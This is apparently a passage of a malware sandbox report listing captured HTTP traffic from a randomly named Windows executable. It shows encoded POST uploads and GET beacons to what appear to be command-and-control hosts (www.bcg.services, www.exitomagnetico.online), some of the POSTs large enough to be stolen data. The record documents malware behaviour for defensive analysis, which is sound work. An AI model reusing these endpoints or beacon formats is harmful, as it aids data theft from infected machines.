                                                                Connection: close
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jADtAwZFExgT%2FK7s5qYJCiLGcG0QQaUQAhlEtQbTA5%2BAx2WpsBvwjQUf9PjoL1WatCmoaysY%2Bmdg5OCWNSIJAe83rzr%2FTSxrNPODA%2FQfPM0BonW0PSo4c%2FFuR8C7JeIeCL108WpF6FxhWB4H"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                X-Frame-Options: SAMEORIGIN
                                                                Referrer-Policy: same-origin
                                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                Server: cloudflare
                                                                CF-RAY: 8efcd68a0dcb420d-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1648&min_rtt=1648&rtt_var=824&sent=6&recv=12&lost=0&retrans=0&sent_bytes=0&recv_bytes=10846&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22
                                                                Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="
                                                                Dec 10, 2024 12:19:06.919251919 CET1236INData Raw: 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 77 77 77 2e 65 78 69 74 6f 6d 61 67 6e 65 74 69 63 6f 2e 6f 6e 6c 69 6e 65 20 7c 20
                                                                Data Ascii: no-js" lang="en-US"> ...<![endif]--><head><title>www.exitomagnetico.online | 520: Web server is returning an unknown error</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-e
                                                                Dec 10, 2024 12:19:06.919265032 CET1236INData Raw: 3a 31 39 3a 30 36 20 55 54 43 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 68 65 61 64 65 72 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 79 2d 38 20 62 67 2d 67 72 61 64 69 65 6e 74 2d 67 72 61 79 22 3e 0a 20 20 20
                                                                Data Ascii: :19:06 UTC</div> </header> <div class="my-8 bg-gradient-gray"> <div class="w-240 lg:w-full mx-auto"> <div class="clearfix md:px-8"> <div id="cf-browser-status" class=" relative w-1
                                                                Dec 10, 2024 12:19:06.919378042 CET1236INData Raw: 63 6f 64 65 5f 35 32 30 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 77 77 77 2e 65 78 69 74 6f 6d 61 67 6e 65 74 69 63 6f 2e 6f 6e 6c 69 6e 65 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72
                                                                Data Ascii: code_520&utm_campaign=www.exitomagnetico.online" target="_blank" rel="noopener noreferrer"> <span class="cf-icon-cloud block md:hidden h-20 bg-center bg-no-repeat"></span> <span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-aut
                                                                Dec 10, 2024 12:19:06.919384956 CET1236INData Raw: 66 75 6c 6c 20 74 72 75 6e 63 61 74 65 22 3e 77 77 77 2e 65 78 69 74 6f 6d 61 67 6e 65 74 69 63 6f 2e 6f 6e 6c 69 6e 65 3c 2f 73 70 61 6e 3e 0a 20 20 3c 68 33 20 63 6c 61 73 73 3d 22 6d 64 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 6d 74 2d 33 20
                                                                Data Ascii: full truncate">www.exitomagnetico.online</span> <h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3"> Host </h3> <span class="leading-1.3 text-2xl text-red-error">Error</span></div>
                                                                Dec 10, 2024 12:19:06.919511080 CET1236INData Raw: 20 61 6e 64 20 79 6f 75 72 20 6f 72 69 67 69 6e 20 77 65 62 20 73 65 72 76 65 72 2e 20 43 6c 6f 75 64 66 6c 61 72 65 20 6d 6f 6e 69 74 6f 72 73 20 66 6f 72 20 74 68 65 73 65 20 65 72 72 6f 72 73 20 61 6e 64 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c
                                                                Data Ascii: and your origin web server. Cloudflare monitors for these errors and automatically investigates the cause. To help support the investigation, you can pull the corresponding error log from your web server and submit it our support team. Pleas
                                                                Dec 10, 2024 12:19:06.919517040 CET776INData Raw: 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d
                                                                Data Ascii: /span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_520&utm_campaign=www.exitomagn
                                                                Dec 10, 2024 12:19:06.919528008 CET8INData Raw: 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: </html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                20192.168.2.449933172.67.182.171804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:19:08.322316885 CET462OUTGET /983l/?pFYX4n=g8WLTYlf9hWOZIADhafhbAM9O+SGnRJzmTuFWyAeHkX1YMY2d2zKbSbTvvKDd0IL0E8lOJWyqcUo2Xu9lNGbM39YcrByqJbp3VLwmzLRU+Qq6DSKHXwmpHA=&rr7x1=pT0pWliPV HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Language: en-US,en;q=0.5
                                                                Connection: close
                                                                Host: www.exitomagnetico.online
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Dec 10, 2024 12:19:09.612426996 CET1236INHTTP/1.1 200 OK
                                                                Date: Tue, 10 Dec 2024 11:19:09 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                alt-svc: h3=":443"; ma=86400
                                                                x-hcdn-request-id: 6d24e2b40196b81b43d0d90ae44db3e2-srv-edge5
                                                                Expires: Tue, 10 Dec 2024 11:19:08 GMT
                                                                Cache-Control: no-cache
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ax5LMuzzXexGbg%2B5i%2BKpCRLXmoXOYghl848z5m30eH1XRCP0L4UW6B7eCC73t%2BsWyNRvluyuyQ%2B6e%2FloO4ldiGIoiP4D3Q%2Bq1bDyYhWv3fa7lk0HWQXeRz3Uvi3kJXPQvU4cmXIN%2B%2B84eqcT"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8efcd69abfbc42b1-EWR
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2110&min_rtt=2110&rtt_var=1055&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=462&delivery_rate=0&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 32 36 66 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e
                                                                Data Ascii: 26f5<!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><lin
                                                                Dec 10, 2024 12:19:09.612435102 CET1236INData Raw: 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 33 2e 33 2e 37 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 20 72 65 6c 3d 73
                                                                Data Ascii: k href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bo
                                                                Dec 10, 2024 12:19:09.612447977 CET1236INData Raw: 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 2d 6d 73 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 2d 6f 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 20
                                                                Data Ascii: tion:all .3s ease-in-out;-ms-transition:all .3s ease-in-out;-o-transition:all .3s ease-in-out;transition:all .3s ease-in-out}li a{color:#fff;margin-left:3px}li>i{color:#fff}.column-wrap a{color:#673de6;font-weight:700;font-size:14px;line-heigh
                                                                Dec 10, 2024 12:19:09.612571001 CET1236INData Raw: 34 38 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 36 70 78 7d 2e 73 65 63 74 69 6f 6e 2d 74 69 74 6c 65 7b 63 6f 6c 6f 72 3a 23 32 66 31 63 36 61 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70
                                                                Data Ascii: 48px;margin-bottom:16px}.section-title{color:#2f1c6a;font-weight:700;font-size:20px;line-height:32px;margin-bottom:16px}.column-custom{border-radius:8px;background-color:#fff;padding:24px;margin-bottom:20px;border:1px solid #dadce0}.column-tit
                                                                Dec 10, 2024 12:19:09.612579107 CET1236INData Raw: 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 32 36 35 37 35 39 38 39 2d 34 34 22 20 61 73 79 6e 63 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72
                                                                Data Ascii: er.com/gtag/js?id=UA-26575989-44" async></script><script>function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer||[],gtag("js",new Date),gtag("config","UA-26575989-44")</script><nav class="navbar navbar-inverse"><div class=
                                                                Dec 10, 2024 12:19:09.612715960 CET1236INData Raw: 6c 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 6e 61 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 65 6d 70 74 79 2d 61 63 63 6f 75 6e 74 2d 70 61 67 65 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6e 74 61 69 6e 65 72 3e 3c 64 69 76 20 63 6c 61 73 73 3d
                                                                Data Ascii: l></div></div></nav><div class=empty-account-page><div class=container><div class="col-xs-12 top-container"><div class=message><h2 id=pathName><i></i></h2><div class=message-subtitle>Happy to see your domain with Hostinger!</div><p>Your domain
                                                                Dec 10, 2024 12:19:09.612721920 CET1236INData Raw: 6d 79 2d 61 63 63 6f 75 6e 74 2d 68 6f 77 2d 74 6f 2d 61 64 64 2d 77 65 62 73 69 74 65 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 41 64 64 20 61 20 77 65 62 73 69 74 65 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73
                                                                Data Ascii: my-account-how-to-add-website rel=nofollow>Add a website</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Change domain nameservers</div><br><p>Manage your domain nameservers in
                                                                Dec 10, 2024 12:19:09.612734079 CET1236INData Raw: 6f 72 28 72 2f 33 35 29 3b 72 65 74 75 72 6e 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 74 2b 33 36 2a 72 2f 28 72 2b 33 38 29 29 7d 74 68 69 73 2e 64 65 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 61 2c 68 2c 66 2c 69 2c 63 2c
                                                                Data Ascii: or(r/35);return Math.floor(t+36*r/(r+38))}this.decode=function(e,t){var a,h,f,i,c,u,d,l,p,g,s,C,w,v,m=[],y=[],E=e.length;for(a=128,f=0,i=72,(c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeA
                                                                Dec 10, 2024 12:19:09.612911940 CET1031INData Raw: 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 77 3f 28 6d 3d 74 5b 64 5d 2c 28 6d 2d 3d 28 6d 2d 39 37 3c 32 36 29 3c 3c 35 29 2b 28 28 21 77 5b 64 5d 26 26 6d 2d 36 35 3c 32 36 29 3c 3c 35 29 29 3a 74 5b 64 5d 29
                                                                Data Ascii: .push(String.fromCharCode(w?(m=t[d],(m-=(m-97<26)<<5)+((!w[d]&&m-65<26)<<5)):t[d]));for(i=c=y.length,0<c&&y.push("-");i<v;){for(l=r,d=0;d<v;++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math.floor((r-f)/(i+1)))throw RangeError("punycode_overflow (1)");fo


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                21192.168.2.44996915.197.204.56804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:19:24.187335014 CET717OUTPOST /xz45/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.5
                                                                Cache-Control: no-cache
                                                                Content-Length: 203
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: www.bcg.services
                                                                Origin: http://www.bcg.services
                                                                Referer: http://www.bcg.services/xz45/
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Data Raw: 70 46 59 58 34 6e 3d 32 45 4e 59 64 38 53 46 76 55 58 5a 38 51 4f 70 74 7a 31 43 51 37 74 42 74 45 42 75 4f 68 57 2f 73 30 65 4a 54 5a 75 66 43 44 36 41 65 78 42 55 77 6a 47 46 62 6c 62 64 4e 47 4f 55 39 6c 77 2b 47 59 76 35 6a 74 45 46 31 54 6e 33 78 49 65 6f 67 68 30 30 51 4c 48 4a 63 48 63 33 43 64 6a 34 6d 30 77 59 34 67 7a 62 66 7a 46 55 4a 47 51 6a 66 4f 72 73 37 4b 6c 34 4d 6a 52 2b 49 35 4b 41 35 66 37 31 70 48 75 32 36 42 36 64 36 34 6d 2f 36 59 76 48 72 6a 35 43 4f 71 36 72 5a 63 6c 54 45 4e 78 52 67 35 4e 30 71 70 54 32 69 49 6f 32 56 6b 48 57 36 2f 57 49 63 4c 64 2f 6e 55 70 39 74 77 3d 3d
                                                                Data Ascii: pFYX4n=2ENYd8SFvUXZ8QOptz1CQ7tBtEBuOhW/s0eJTZufCD6AexBUwjGFblbdNGOU9lw+GYv5jtEF1Tn3xIeogh00QLHJcHc3Cdj4m0wY4gzbfzFUJGQjfOrs7Kl4MjR+I5KA5f71pHu26B6d64m/6YvHrj5COq6rZclTENxRg5N0qpT2iIo2VkHW6/WIcLd/nUp9tw==
                                                                Dec 10, 2024 12:19:25.257389069 CET73INHTTP/1.1 405 Method Not Allowed
                                                                content-length: 0
                                                                connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                22192.168.2.44997515.197.204.56804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:19:27.014391899 CET737OUTPOST /xz45/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.5
                                                                Cache-Control: no-cache
                                                                Content-Length: 223
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: www.bcg.services
                                                                Origin: http://www.bcg.services
                                                                Referer: http://www.bcg.services/xz45/
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Data Raw: 70 46 59 58 34 6e 3d 32 45 4e 59 64 38 53 46 76 55 58 5a 39 7a 47 70 72 51 64 43 48 72 74 43 68 6b 42 75 48 42 57 37 73 30 61 4a 54 62 66 41 43 57 71 41 65 51 52 55 33 6d 79 46 53 31 62 64 5a 32 4f 56 77 46 77 70 47 59 79 4f 6a 74 34 46 31 53 44 33 78 4e 79 6f 6a 53 63 33 52 62 48 48 55 6e 63 70 66 74 6a 34 6d 30 77 59 34 68 53 2b 66 77 31 55 4a 30 45 6a 65 72 66 74 32 71 6c 35 64 6a 52 2b 65 4a 4b 45 35 66 36 57 70 47 43 59 36 48 32 64 36 34 57 2f 30 70 76 49 34 44 35 45 54 61 37 55 64 4e 4a 62 4c 2b 34 79 67 5a 64 50 76 6f 66 6d 75 75 6c 73 45 56 6d 42 6f 2f 79 37 42 4d 55 4c 71 58 55 30 32 2f 54 6e 44 34 41 75 67 65 2b 47 6e 5a 43 41 61 6a 67 61 43 4b 30 3d
                                                                Data Ascii: pFYX4n=2ENYd8SFvUXZ9zGprQdCHrtChkBuHBW7s0aJTbfACWqAeQRU3myFS1bdZ2OVwFwpGYyOjt4F1SD3xNyojSc3RbHHUncpftj4m0wY4hS+fw1UJ0Ejerft2ql5djR+eJKE5f6WpGCY6H2d64W/0pvI4D5ETa7UdNJbL+4ygZdPvofmuulsEVmBo/y7BMULqXU02/TnD4Auge+GnZCAajgaCK0=
                                                                Dec 10, 2024 12:19:27.981198072 CET73INHTTP/1.1 405 Method Not Allowed
                                                                content-length: 0
                                                                connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                23192.168.2.44998515.197.204.56804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:19:29.690104961 CET10819OUTPOST /xz45/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.5
                                                                Cache-Control: no-cache
                                                                Content-Length: 10303
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: www.bcg.services
                                                                Origin: http://www.bcg.services
                                                                Referer: http://www.bcg.services/xz45/
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Data Raw: 70 46 59 58 34 6e 3d 32 45 4e 59 64 38 53 46 76 55 58 5a 39 7a 47 70 72 51 64 43 48 72 74 43 68 6b 42 75 48 42 57 37 73 30 61 4a 54 62 66 41 43 56 4b 41 66 67 4e 55 78 42 65 46 49 31 62 64 46 6d 4f 59 77 46 77 6f 47 59 36 4b 6a 74 31 79 31 52 72 33 78 72 6d 6f 69 6a 63 33 66 62 48 48 59 48 63 30 43 64 69 6c 6d 31 41 6d 34 67 2b 2b 66 77 31 55 4a 31 30 6a 4f 4f 72 74 30 71 6c 34 4d 6a 52 4d 49 35 4c 5a 35 66 79 6f 70 47 47 6d 36 58 57 64 37 63 79 2f 32 66 37 49 37 6a 35 47 53 61 37 4d 64 4e 45 46 4c 39 4d 45 67 61 42 6c 76 6f 62 6d 34 50 51 71 57 56 36 72 35 4a 65 36 61 66 4e 73 6c 47 77 6b 36 66 7a 51 4b 35 63 77 77 63 4f 37 39 37 4c 53 47 44 34 4a 42 64 47 77 5a 2f 77 42 54 79 44 46 4a 73 2f 6d 61 35 4a 47 6f 63 38 6d 38 4c 69 77 44 4b 67 6d 48 4c 36 42 68 62 2f 32 61 6b 31 36 6f 79 59 66 33 78 5a 79 30 2f 72 54 51 2b 68 6e 51 5a 65 30 51 42 39 41 67 78 68 34 37 54 67 54 32 59 78 79 66 79 78 41 6f 4c 52 41 6e 33 45 76 64 50 4a 64 31 4b 65 31 62 75 77 69 75 4c 75 52 47 30 53 74 5a 34 71 59 76 57 56 [TRUNCATED]
                                                                Data Ascii: pFYX4n=2ENYd8SFvUXZ9zGprQdCHrtChkBuHBW7s0aJTbfACVKAfgNUxBeFI1bdFmOYwFwoGY6Kjt1y1Rr3xrmoijc3fbHHYHc0Cdilm1Am4g++fw1UJ10jOOrt0ql4MjRMI5LZ5fyopGGm6XWd7cy/2f7I7j5GSa7MdNEFL9MEgaBlvobm4PQqWV6r5Je6afNslGwk6fzQK5cwwcO797LSGD4JBdGwZ/wBTyDFJs/ma5JGoc8m8LiwDKgmHL6Bhb/2ak16oyYf3xZy0/rTQ+hnQZe0QB9Agxh47TgT2YxyfyxAoLRAn3EvdPJd1Ke1buwiuLuRG0StZ4qYvWVASBPaI0KInmauTD3CyM1hO58/JCLTjxMAwXh83DXkRce9tES0JYWpZxe5UQCsHnD0gnj49DqSyKbwqnZijEChaaFOO5czKM64rKvaelWGYNA79C65DIfKfiGdfiZ696D0T4JMt1Au1UKrM2xnGBdndsD1Yttc0BPg5FgiUJNAHQj1SeBrqV4SWzPuoX5mZV31yaAdzJEH7KorkNULhAOt4dUuAl0JNg3kBfNqS11pvNbP3c+Lw97Lb821miY1RGH2901F33Y4IXSBb9E8JRoXEoA+DS8fQrEc46/KoU29pRxhNWywy746KerRDyKLnqddkRKvXZ9xKwbI1cyZLKyR9oOR1UlvdYFefahpoT8gXo9lsdcmbvZN1y1vaJQiHDEZkrqrhBbI13/xXFrppEXByZQ7xzZTEU8i+Ta0xoxWvEQ8y7k12LwGPn6meRDKsrriWFPoCcc+tBS2suzywTS24HMMOhi0IEscuixuA3KxdXqWYElsnYcDP9rDOmG8Eq23um03lg9/K7neRoPvMZ8mYXQqbwa2VTtti8/4VBi4tYpU6OzpoF8/qitdsIz8/sknBDYYG4fPVCuA8BygPikayWU2R6oBocynx5FR9FVgNFoZUh133KvfppGSw9DlKGeSNvSVOU7jTuUXreDIXNiKqnE2H+wcGgsKm [TRUNCATED]
                                                                Dec 10, 2024 12:19:30.766110897 CET73INHTTP/1.1 405 Method Not Allowed
                                                                content-length: 0
                                                                connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                24192.168.2.44999215.197.204.56804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:19:32.353166103 CET453OUTGET /xz45/?pFYX4n=7Gl4eI2ymk7esmTKiyocBpF5qhx3QEeonx7jFa75SCeEQi1G+RGQY0LgPCeJyXg2C6GorcwS5UbL8Y/pt3QrWo2hcBs/CYK05Fwqw3imWS0YPWk6eLj68dM=&rr7x1=pT0pWliPV HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Language: en-US,en;q=0.5
                                                                Connection: close
                                                                Host: www.bcg.services
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Dec 10, 2024 12:19:33.443784952 CET379INHTTP/1.1 200 OK
                                                                content-type: text/html
                                                                date: Tue, 10 Dec 2024 11:19:33 GMT
                                                                content-length: 258
                                                                connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 70 46 59 58 34 6e 3d 37 47 6c 34 65 49 32 79 6d 6b 37 65 73 6d 54 4b 69 79 6f 63 42 70 46 35 71 68 78 33 51 45 65 6f 6e 78 37 6a 46 61 37 35 53 43 65 45 51 69 31 47 2b 52 47 51 59 30 4c 67 50 43 65 4a 79 58 67 32 43 36 47 6f 72 63 77 53 35 55 62 4c 38 59 2f 70 74 33 51 72 57 6f 32 68 63 42 73 2f 43 59 4b 30 35 46 77 71 77 33 69 6d 57 53 30 59 50 57 6b 36 65 4c 6a 36 38 64 4d 3d 26 72 72 37 78 31 3d 70 54 30 70 57 6c 69 50 56 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?pFYX4n=7Gl4eI2ymk7esmTKiyocBpF5qhx3QEeonx7jFa75SCeEQi1G+RGQY0LgPCeJyXg2C6GorcwS5UbL8Y/pt3QrWo2hcBs/CYK05Fwqw3imWS0YPWk6eLj68dM=&rr7x1=pT0pWliPV"}</script></head></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
